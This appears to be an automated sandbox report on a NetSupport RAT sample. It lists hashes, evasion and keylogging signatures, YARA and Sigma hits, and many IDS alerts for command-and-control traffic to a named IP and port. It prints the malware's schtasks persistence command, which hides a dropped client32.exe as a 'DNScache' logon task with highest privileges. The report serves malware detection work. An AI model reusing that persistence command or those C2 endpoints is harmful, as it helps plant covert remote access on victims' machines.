Edit tour

Windows Analysis Report
lFxGd66yDa.exe

Overview

General Information

Sample name:	lFxGd66yDa.exe renamed because original name is a hash value
Original sample name:	d5f5204efc969b0a9a132413c637f09bce02cff7ea932c504d418e80265158f9.exe
Analysis ID:	1572208
MD5:	ecfdde187846c27fef59c61d42d474b3
SHA1:	25d35ff7f5c38626bd77b5cd9fed849fd1186499
SHA256:	d5f5204efc969b0a9a132413c637f09bce02cff7ea932c504d418e80265158f9
Tags:	exeganeres1-comganeres2-comnetsupportuser-JAMESWT_MHT
Infos:

Detection

NetSupport RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

AI detected suspicious sample

Contains functionality to detect sleep reduction / modifications

Contains functionalty to change the wallpaper

Delayed program exit found

Found evasive API chain (may stop execution after checking mutex)

Uses known network protocols on non-standard ports

Uses schtasks.exe or at.exe to add and modify task schedules

Binary contains a suspicious time stamp

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

PE file does not import any functions

Potential key logger detected (key state polling based)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara detected Keylogger Generic

Yara detected NetSupport remote tool

Classification

Process Tree

System is w10x64

lFxGd66yDa.exe (PID: 5272 cmdline: "C:\Users\user\Desktop\lFxGd66yDa.exe" MD5: ECFDDE187846C27FEF59C61D42D474B3)

schtasks.exe (PID: 3540 cmdline: "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

client32.exe (PID: 4412 cmdline: C:\Users\user\AppData\Local\DNScache\client32.exe MD5: 9497AECE91E1CCC495CA26AE284600B9)

client32.exe (PID: 1548 cmdline: C:\Users\user\AppData\Local\DNScache\client32.exe MD5: 9497AECE91E1CCC495CA26AE284600B9)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\DNScache\pcicapi.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Local\DNScache\client32.exe	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Local\DNScache\PCICHEK.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Local\DNScache\AudioCapture.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Local\DNScache\TCCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Local\DNScache\HTCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Local\DNScache\PCICL32.DLL	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Local\DNScache\PCICL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.2269416525.000000001118F000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000006.00000002.2269416525.000000001118F000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000000.00000003.2217053423.0000000000B74000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000000.00000003.2217114600.0000000000B74000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000000.00000003.2193775165.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000000.00000003.2217053423.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000006.00000002.2269461885.00000000111DC000.00000004.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: lFxGd66yDa.exe PID: 5272	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 4412	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 4412	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 1548	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 1548	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author
6.2.client32.exe.6c6f0000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.client32.exe.6c6f0000.6.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.client32.exe.6c6d0000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.0.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0.3.lFxGd66yDa.exe.b7f5f0.4.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.client32.exe.111b32a0.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
6.2.client32.exe.111b32a0.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0.3.lFxGd66yDa.exe.b7f5f0.3.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.client32.exe.6c6d0000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.0.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.client32.exe.111b32a0.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.2.client32.exe.111b32a0.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.client32.exe.6c3c0000.3.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
6.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
6.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
4.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 14 entries

Sigma Signatures

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\lFxGd66yDa.exe", ParentImage: C:\Users\user\Desktop\lFxGd66yDa.exe, ParentProcessId: 5272, ParentProcessName: lFxGd66yDa.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST, ProcessId: 3540, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T08:57:17.526632+0100	2803305	3	Unknown Traffic	192.168.2.6	49707	23.254.224.41	443	TCP
2024-12-10T08:57:19.700702+0100	2803305	3	Unknown Traffic	192.168.2.6	49708	23.254.224.41	443	TCP
2024-12-10T08:57:24.601259+0100	2803305	3	Unknown Traffic	192.168.2.6	49710	23.254.224.41	443	TCP
2024-12-10T08:57:26.969053+0100	2803305	3	Unknown Traffic	192.168.2.6	49712	23.254.224.41	443	TCP

ETPRO MALWARE NetSupport RAT CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T08:57:31.114762+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:57:31.506215+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:20.568018+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:30.170965+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:31.992977+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:32.192953+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:32.394956+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:32.494983+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:32.595953+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:32.695980+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:32.796147+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:32.896063+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:32.996961+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:33.099984+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:33.200966+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:33.353287+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:33.353287+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:33.763049+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:33.963985+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.064987+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.164977+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.265989+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.365963+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.466018+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.566974+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.667007+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.768093+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.868968+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:34.972688+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.069954+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.169980+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.270969+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.371106+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.471004+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.572691+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.676705+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.773044+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.873998+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:35.975028+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.075000+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.174981+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.276001+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.375993+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.476971+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.577983+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.677994+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.778011+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.879720+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:36.979493+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.080699+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.180688+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.278974+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.379064+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.479958+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.579973+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.679980+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.784524+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.881237+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:37.982070+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.091120+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.191974+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.291992+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.393031+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.493013+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.593968+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.695107+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.794981+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.898696+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:38.998759+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:39.095974+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:39.196975+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:39.298964+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:39.401810+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:39.502999+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:39.603005+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:39.706932+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:39.804968+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:39.906041+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.007002+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.107010+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.206999+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.307999+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.408011+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.508026+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.609022+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.710042+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.811048+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:40.914705+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.014825+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.114808+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.212971+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.314743+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.414002+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.514758+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.618734+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.714987+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.816699+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:41.915975+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.017009+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.117993+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.219019+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.319976+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.419982+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.519998+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.621015+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.721025+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.824695+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:42.924700+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.024702+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.124696+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.224001+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.324702+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.428703+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.524992+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.628698+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.728716+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.826996+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:43.926995+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.028038+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.128002+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.228017+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.328991+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.429085+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.529997+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.631067+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.732016+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.833890+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:44.934814+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.035697+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.133976+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.234968+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.335976+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.438747+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.536980+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.637987+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.738003+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.839043+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:58:45.940007+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.6	49723	88.210.12.58	3785	TCP
